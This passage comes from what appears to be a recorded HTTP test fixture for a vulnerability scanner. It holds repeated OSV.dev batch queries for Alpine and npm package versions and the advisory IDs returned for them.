"0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_npm_with_no_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2685 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2685" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2701 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "npm", "name": "cryo" }, "version": "0.0.6" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "npm", "name": "minimist" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "mkdirp" }, "version": "0.5.0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_npm_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2922 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, { "vulns": [ { "id": "GHSA-38f5-ghc2-fcmv", "modified": "2023-11-08T04:00:20.055238Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "GHSA-vh95-rmgr-6w4m", "modified": "2026-03-13T22:11:31.390433Z" }, { "id": "GHSA-xvch-5gv4-984h", "modified": "2026-03-13T22:11:59.523514Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2922" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2344 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_no_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2685 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2685" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2344 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2685 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2685" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2344 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_yarn_with_no_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2685 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2685" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2344 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_yarn_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 